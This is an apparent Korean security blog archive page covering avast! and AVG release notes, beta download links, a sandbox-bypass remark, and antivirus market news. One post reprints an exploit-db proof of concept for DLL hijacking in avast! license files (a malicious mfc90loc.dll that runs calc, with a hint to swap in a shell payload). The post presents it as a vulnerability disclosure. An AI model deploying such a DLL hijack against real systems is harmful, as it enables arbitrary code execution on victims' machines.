전세계적으로 무료 백신으로 인정받고 있는 AVG Technologies에서 새로운 버전인 AVG Anti-Virus 2011 제품 군에서 무료 제품을 출시했습니다.


참고로, 인터넷 시큐리티와 안티바이러스 제품은 기존과 마찬가지로 유료로 제공됩니다.

AVG Anti-Virus 2011 Free 제품의 다운로드 링크는 다음과 같습니다.


감사합니다.




reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    댓글을 달아 주세요

    어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

    이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

    • 무료 제품: http://files.avast.com/files/beta/5.0.677/setup_av_free.exe
    • 프로 제품: http://files.avast.com/files/beta/5.0.677/setup_av_pro.exe
    • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.677/setup_ais.exe

    기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.


    어베스트! V5.0.677 정식버전에서 개선되거나 추가된 기능은 다음과 같습니다.

    • 어베스트! 서비스가 사자리는 문제점 해결
    • 행동방어: 안정성 문제 해결(aswSP.sys) 및 윈도우 7에서 발생하는 문제점 해결
    • 어베스트! 샌드박스에서 안정성 및 성능 향상
    • 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
    • 업데이트 프로그램 속도 향상
    • IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
    • 라이선스 파일에 관련된 취약점 해결 - DLL Hijacking 취약점(SA41109)
    • 긴 파일이름을 가진 파일을 검사할 때 발생하는 문제점 해결
    • 윈도우에서 다른 언어로 사용하는 경우 아시아 계얼의 버전에서 업데이터에서 발생하는 문제 해결
    • IS: 아웃룩 안티스팸 플러그인 기능 향상
    • IS: 새로운 안티스팸 엔진으로 업그레이드
    • 방화벽: 바로가기 등 경로에 관련된 처리 강화
    • GUI에서 일부 사항 변경 및 버그 수정
    • 스크린 리더 지원 향상
    • 파일 시스템 방어가 중지된 상태에서 특정 파일을 검사하는 버그 수정
    • setup.log 파일의 정리 기능추가
    • 덴마크, 헤브류, Urdu(우르두 어, 파키스탄 공용어) 언어 추가

    출처: http://www.avast.com/release-history
    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus

      댓글을 달아 주세요

      어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

      이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

      •무료 제품: http://files.avast.com/files/beta/5.0.673/setup_av_free.exe
      • 프로 제품: http://files.avast.com/files/beta/5.0.673/setup_av_pro.exe
      • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.673/setup_ais.exe

      기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.


      어베스트! V5.0.673 베타버전에서 개선되거나 추가된 기능은 다음과 같습니다.
      • 샌드 박스의 안정성 강화
      • 새로운 언어 모듈의 일부 버그 수정
      • 방화벽: 바로가기 등 경로에 관련된 처리 강화
      • setup.log 파일의 정리 기능추가
      • 어베스트! 서비스의 안정성 향상


      어베스트! V5.0.668 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

      • V5.0.661 베타 버전에서 발생했던 메모리 누수 문제 해결
      • 사용자 인터페이스에서 일부 항목 수정
      • 샌드박스의 기능 향상
      • IS: 아웃룩 안티스팸 플러그인 기능 향상


      어베스트! V5.0.661 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

      • 라이선스 파일에 관련된 취약점 해결 - DLL Hijacking 취약점(SA41109)
      • 파일 시스템 방어 상태에서 사용자 인터페이스 문제점 해결 
      • 긴 파일이름을 가진 파일을 검사할 때 발생하는 문제점 해결
      • 윈도우에서 다른 언어로 사용하는 경우 아시아 계얼의 버전에서 업데이터에서 발생하는 문제 해결
      • Urdu(우르두 어, 파키스탄 공용어) 언어 추가

      참고로, 어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

      • 어베스트! 서비스가 사자리는 문제점 해결
      • 행동방어: 안정성 문제 해결(aswSP.sys)
      • 어베스트! 샌드박스에서 안정서 및 성능 향상
      • 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
      • 업데이트 속도 향상
      • IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
      • IS: 새로운 안티스팸 엔진으로 업그레이드
      • GUI에서 일부 사항 변경 및 버그 수정
      • 스크린 리더 지원 향상
      • 언어 추가:  덴마크어, 헤브류어


      출 처: http://forum.avast.com/index.php?topic=63151.0

      감사합니다.

      PS: 현재 어베스트 V5.0.xxx에서 주로 문제가 발생하거나 호환성이 향상되는 부분이 바로 IS 제품에서 제공하는 방화벽, 안티스팸. 그리고 Pro 제품의 샌드박스 쪽이 주된 부분입니다.


      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus

        댓글을 달아 주세요

        어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

        이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

        •무료 제품: http://files.avast.com/files/beta/5.0.668/setup_av_free.exe
        • 프로 제품: http://files.avast.com/files/beta/5.0.668/setup_av_pro.exe
        • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.668/setup_ais.exe

        기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.

        어베스트! V5.0.668 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

        • V5.0.661 베타 버전에서 발생했던 메모리 누수 문제 해결
        • 사용자 인터페이스에서 일부 항목 수정
        • 샌드박스의 기능 향상
        • IS: 아웃룩 안티스팸 플러그인 기능 향상


        어베스트! V5.0.661 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

        • 라이선스 파일에 관련된 취약점 해결 - DLL Hijacking 취약점(SA41109)
        • 파일 시스템 방어 상태에서 사용자 인터페이스 문제점 해결 
        • 긴 파일이름을 가진 파일을 검사할 때 발생하는 문제점 해결
        • 윈도우에서 다른 언어로 사용하는 경우 아시아 계얼의 버전에서 업데이터에서 발생하는 문제 해결
        • Urdu(우르두 어, 파키스탄 공용어) 언어 추가

        참고로, 어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

        • 어베스트! 서비스가 사자리는 문제점 해결
        • 행동방어: 안정성 문제 해결(aswSP.sys)
        • 어베스트! 샌드박스에서 안정서 및 성능 향상
        • 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
        • 업데이트 속도 향상
        • IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
        • IS: 새로운 안티스팸 엔진으로 업그레이드
        • GUI에서 일부 사항 변경 및 버그 수정
        • 스크린 리더 지원 향상
        • 언어 추가:  덴마크어, 헤브류어


        출 처: http://forum.avast.com/index.php?topic=63151.0

        감사합니다.

        PS: 현재 어베스트 V5.0.xxx에서 주로 문제가 발생하거나 호환성이 향상되는 부분이 바로 IS 제품에서 제공하는 방화벽, 안티스팸. 그리고 Pro 제품의 샌드박스 쪽이 주된 부분입니다.

        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus

          댓글을 달아 주세요

          어베스트! V5 버전이 출시되면서 새롭게 등장한 기능이 바로 Process Virtualization으로 실제로는 Sandbox의 한 형태로 볼 수 있습니다.

          Sandbox는 프로그램 내에 하나의 계층을 더 두어, 보안을 강화하는 기능으로 이에 대한 자세한 사항은 아래 링크를 참고하십시오.

          http://ko.wikipedia.org/wiki/%EC%83%8C%EB%93%9C%EB%B0%95%EC%8A%A4_(%EC%BB%B4%ED%93%A8%ED%84%B0_%EB%B3%B4%EC%95%88)

          이러한 샌드박스 기능을 통해 행동이 의심스러운 파일을 사용할 때에 보다 안전을 도모할 수 있습니다.

          하지만, 이러한 샌드박스에도 결점이 있다는 점을 아는 사람은 그리 많지 않습니다. 바이러스에 관심을 가진 사람들이 샌드박스를 애용하지만, 이를 우회할 수 있는 악성 프로그램이 존재합니다. 또한, 악성 프로그램은 샌드박스와 같은 가상화 운영 환경을 인식하여 동작을 중지하는 스마트~한 것들도 있습니다.


          <동영상: 어베스트! V5 프로 제품에서 샌드박스 기능을 우회>

          따라서, 바이러스와 같은 악성 프로그램을 다루는 사용자는 반드시 VMWare와 같은 가상환경이나 실제 PC에 악성코드를 감염시켜 확인하는 방법을 사용하는 것이 좋습니다.

          감사합니다.

          PS: 어베스트!의 취약점이라기 보다는 기능 자체의 한계라고 보는 편이 타당합니다. 다른 보안 제품도 마찬가지이니까요.

          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus

            댓글을 달아 주세요

            어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

            이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

            •무료 제품: http://files.avast.com/files/beta/5.0.661/setup_av_free.exe
            • 프로 제품: http://files.avast.com/files/beta/5.0.661/setup_av_pro.exe
            • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.661/setup_ais.exe

            기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.

            어베스트! V5.0.661 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

            • 라이선스 파일에 관련된 취약점 해결 - DLL Hijacking 취약점(SA41109)
            • 파일 시스템 방어 상태에서 사용자 인터페이스 문제점 해결 
            • 긴 파일이름을 가진 파일을 검사할 때 발생하는 문제점 해결
            • 윈도우에서 다른 언어로 사용하는 경우 아시아 계얼의 버전에서 업데이터에서 발생하는 문제 해결
            • Urdu(우르두 어, 파키스탄 공용어) 언어 추가

            참고로, 어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

            • 어베스트! 서비스가 사자리는 문제점 해결
            • 행동방어: 안정성 문제 해결(aswSP.sys)
            • 어베스트! 샌드박스에서 안정서 및 성능 향상
            • 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
            • 업데이트 속도 향상
            • IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
            • IS: 새로운 안티스팸 엔진으로 업그레이드
            • GUI에서 일부 사항 변경 및 버그 수정
            • 스크린 리더 지원 향상
            • 언어 추가:  덴마크어, 헤브류어


            출 처: http://forum.avast.com/index.php?topic=63151.0

            감사합니다.


            PS: 최근 발견된 DLL Hijacking 취약점이 해결되었습니다.

            끝.

            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus

              댓글을 달아 주세요

              어베스트! V5 버전이 출시되면서 베타 버전의 출시에도 약간의 변화가 생겼습니다. 즉, 마이너 버전이라 하더라도 정식 출시 전에 베타로 먼저 출시한 후에 문제점이 있는지 먼저 검증합니다.

              이번에 발표하는 베타 버전은 어베스트! 무료 버전, 프로 에디션, 인터넷 시큐리티 제품 모두에 해당합니다. 다운로드 링크는 다음과 같습니다.

              •무료 제품: http://files.avast.com/files/beta/5.0.656/setup_av_free.exe
              • 프로 제품: http://files.avast.com/files/beta/5.0.656/setup_av_pro.exe
              • 인터넷 시큐리티: http://files.avast.com/files/beta/5.0.656/setup_ais.exe

              기존에 V4.8 제품이나 V5.0.xxx 제품을 사용하고 있더라도 모두 적용이 가능하며, 업데이트 설치가 완료된 후에는 반드시 재부팅을 해야 합니다. 또한 기존 최신 정식이었던 V5.0.594를 설치하여 사용중이라도 업데이트할 수 있습니다.


              어베스트! V5.0.656 베타에서 개선되거나 추가된 기능은 다음과 같습니다.

              • 어베스트! 서비스가 사자리는 문제점 해결
              • 행동방어: 안정성 문제 해결(aswSP.sys)
              • 어베스트! 샌드박스에서 안정서 및 성능 향상
              • 특정한 새로운 형태의 익스플로잇을 진단 및 차단하기 위해 엔진 일부 변경
              • 업데이트 속도 향상
              • IS: aswFw.sys에서 발견된 취약점 해결(Secunia Advisory SA40868)
              • IS: 새로운 안티스팸 엔진으로 업그레이드
              • GUI에서 일부 사항 변경 및 버그 수정
              • 스크린 리더 지원 향상
              • 언어 추가:  덴마크어, 헤브류어


              출 처: http://forum.avast.com/index.php?topic=63151.0

              감사합니다.


              PS: 최근 발견된 DLL Hijacking 취약점에 대해서는 아직 언급되지 않은 상태입니다.

              끝.
              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus

                댓글을 달아 주세요

                최근 보안 아니 윈도우 업계를 강타하고 있는 취약점이 바로 DLL Hijacking입니다. DLL은 윈도우 실행파일이 참조하는 라이브러리 파일인데, 문제는 DLL 파일의 경로를 제대로 검증하지 않아 이를 통해 공격을 하는 형태로 이미 예전부터 예견되어 있던 취약점입니다.

                DLL Hijacking 취약점에 대한 자세한 사항은 아래 링크를 참고하시면 금방 이해가 되실 것으로 생각됩니다.


                하여튼, 어베스트! 안티바이러스 제품의 최신 버전에서도 DLL Hijacking 취약점을 가지고 있는 것으로 알려져 있습니다. 어베스트!의 최신 버전은 V5.0.594이며, mfc90loc.dll 파일에서 이 취약점이 존재합니다. mfc90loc.dll은 라이선스 파일에 관련된 DLL 입니다.

                # Exploit Title: avast! license files DLL Hijacking Exploit (mfc90loc.dll)
                # Date: 25/08/2010
                # Author: Bruno Filipe (diwr) http://digitalacropolis.us
                # Software Link: http://www.avast.com <http://www.bsplayer.org>
                # Version: <= 5.0.594
                # Tested on: WinXP SP2, WinXP SP3
                # Thx TheLeader ;)
                #
                ----------------------------------------------------------------------------------------------------------
                # This should work with avast license files (.avastlic)
                # 1. gcc dllmain.c -o mfc90loc.dll
                # 2. Put mfc90ptb.dll in the same directory of an avast license file (EG:
                anything.avastlic)
                # 3. You can generate a msfpayload DLL and spawn a shell, for example.
                #
                ----------------------------------------------------------------------------------------------------------

                #include <windows.h>

                int main()
                {
                WinExec("calc", SW_NORMAL);
                exit(0);
                return 0;
                }

                BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
                {
                main();
                return 0;
                }

                하지만 실제적으로 어베스트!에서는 실시간 감시 및 자기 보호 기능이 월등하기 때문에 이 취약점을 직접적으로 이용하여 공격하기에는 약간 어려운 부분이 있을 수 있습니다만, 그래도 어베스트! 제작사의 빠른 대응이 필요한 시점으로 보입니다.

                감사합니다.

                출처: http://www.exploit-db.com/exploits/14743/


                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus

                  댓글을 달아 주세요

                  IT 산업에 있어서도 중국의 약진이 서서히 나타나는 가운데, 백신(안티바이러스) 시장에서도 일대 변혁이 일어날 조짐을 보이고 있습니다.

                  중국에는 다수의 백신 개발사가 있으며, 이중 기술력을 어느정도 가진 것으로 검증된 회사만 해도 서너개 정도 됩니다. 여기서 검증이라는 의미는 ICSA Labs나 VB100 인증을 통과했다는 의미입니다.

                  Keniu Network Technology는 kingsoft Antivirus 회사를 계열로 가지고 있는 Beiker.com을 인수 합병한 이후에, 이 제품을 이용하여 첫번째 무료 백신을 지난 8월 11일에 발표한다고 공개했습니다.

                  백신 이름은 Keniu Antivirus 1.0 이며, 주요 엔진은 듀얼로, 카스퍼스키 안티바이러스 OEM 엔진과 자체 기술로 개발된 클라우드 기반의 엔진으로 구성된다고 합니다.

                  아직 중국이나 인도에서 개발된 보안 제품들은 사용자 인터페이스가 투박하고 촌스럽다는 평이 많습니다만, 실제로 기능만으로 살펴 본다면 국내 제품과 성능이 엇비슷하거나 더 훌륭한 제품이 있는 것 또한 사실입니다.


                  아래는 최근에 평가한 결과인데, 결과가 재미있어 첨언합니다.

                  < http://arrestlove.tistory.com 에서 발췌함 >

                  2010년 8월 바이러스 블러틴이 실시한 평가에서 아이러니하게도 Kingsoft 제품은 전멸, Keniu 제품은 통과했습니다. 이제 낙장 불입!

                  감사합니다.
                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus

                    댓글을 달아 주세요

                    1. Favicon of http://arrestlove.tistory.com BlogIcon 물여우 2010.08.13 13:17  댓글주소  수정/삭제  댓글쓰기

                      킹소프트와도 연관성이 있었군요. 킹소프트도 다양한 제품군을 항상 vb100에 내보내던데, 이번에는 약간 아쉬웠나 봅니다.

                      그나저나 keniu가 무료 제품이었다니 또 혹하네요. ^^;

                    외국에서 인기있는 무료백신(Free Antivirus, 공짜백신)의 링크를 모아 봤습니다. 필요하신 분들 이용하시기 바랍니다.


                    이외에도 많은 제품들이 있습니다만, 가짜백신이거나 유료제품과 성능이나 기능적 차이가 나는 경우가 많습니다.

                    감사합니다.
                    reTweet
                    Posted by 문스랩닷컴
                    blog comments powered by Disqus

                      댓글을 달아 주세요



                      Web Analytics Blogs Directory